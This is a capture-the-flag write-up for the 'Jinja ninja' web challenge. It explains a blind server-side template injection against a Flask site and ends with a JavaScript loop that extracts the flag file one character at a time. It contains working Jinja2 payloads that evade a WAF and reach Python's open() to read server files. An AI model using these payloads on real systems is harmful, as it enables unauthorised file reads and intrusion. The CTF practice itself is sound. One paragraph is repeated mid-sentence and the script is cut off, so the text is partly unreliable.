Jinja ninja
- Road to Valhalla part 2
- hard
In part 1 of Road to Valhalla, you managed to capture another drawing, with a note on it.
If you seek to find Valhalla, visit this website, and buy your ticket now: https://jinja-ninja.secchallenge.crysys.hu
As you check the website, it feels a bit fishy. As a citizen of the wastes, you feel it as your duty to check if the travel agency is valid. Find a way to access files on the server you might find coordinates of Valhalla.
author: Pepe
I could not solve this challenge
instantly triggers me to think about SSTI and Flask. Sadly, I could not find ANY reflection on the webpage we are given, it just returned the same page no matter what I’ve sent to it.
(Just solved it after writing those lines above)
Basically, we don’t have a reflection, so we can’t simply confirm if we have a SSTI, but the name is a strong hint to that.
For most form data, you get Sorry site under construction booking is not available.
as a response.
I’ve tried injecting {{5*5}}
as any parameter, and I’ve got The WAF catched that one.
- so some part of that is filtered, and it turns out that {{
and flag
are forbidden in the input.
After googling flask blind ssti
I’ve found this page, witch details a method of bypassing the {{
That page’s method kinda works here, but we still don’t get anything back. I’ve tried {{
and flag
are forbidden in the input.
After googling flask blind ssti
I’ve found this page, witch details a method of bypassing the {{
That page’s method kinda works here, but we still don’t get anything back. I’ve tried {% for i in range(5/0) %}1{% endfor %}
and got Something went wrong, try again later!
- so we can leak one bit of information at a time.
I was not sure where can the flag be, my initial guess was the config
oject. {% for i in range(5 if config else 5/0) %}1{% endfor %}
confirmed it exits, but it had only one key ({% for i in range(5 if [config.keys()][1] else 5/0) %}1{% endfor %}
), and that was ENV
({% for i in range(5 if config["ENV"]=="production" else 5/0) %}1{% endfor %}
From the same gist I’ve learned that I can get access to some of the globals, so I’ve tried opening the file flag
. Bypassing the filtering for flag
was trivial: {% for i in range(5 if get_flashed_messages.__globals__.__builtins__.open("FLAG".lower()) else 5/0) %}1{% endfor %}
So we can just open the file! Let’s check the first character: {% for i in range(5 if get_flashed_messages.__globals__.__builtins__.open("FLAG".lower()).read()[0]=="c" else 5/0) %}1{% endfor %}
- c
as we expected from the flag format.
I’ve took some time to get it’s length by binary-searching from 500, and found it’s 145. After that, I’ve wrote a script to use the previous tactic to get the full flag.
Sadly, my script (written in python) did not work for some reason, so I re-wrote it in JS and copy-pasted it in the console:
const printable = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~ \t\n\r\x0b\x0c";
async function solve(length = 145) {
let FLAG = "";
while (FLAG.length < length) {
for (let c of printable) {
let formData = new FormData();
const payload = `{% for i in range(5 if get_flashed_messages.__globals__.__builtins__.open("FLAG".lower()).read()[${FLAG.length}]=="${c}" else 5/0) %}1{% endfor %}`;
formData.append('name', payload);
formData.append('email', '');
formData.append('faction', '');
formData.append('profession', '');
formData.append('preferences', '');
const resp = await fetch("submit",{body: formData,method: "post"})
const text = await resp.text();
if (text.includes("Sorry site under construction")) {
FLAG = FLAG + c;
And that just got me the flag…
(also, I heard others used this blind SSTI to write a file in the web folder with the flag inside)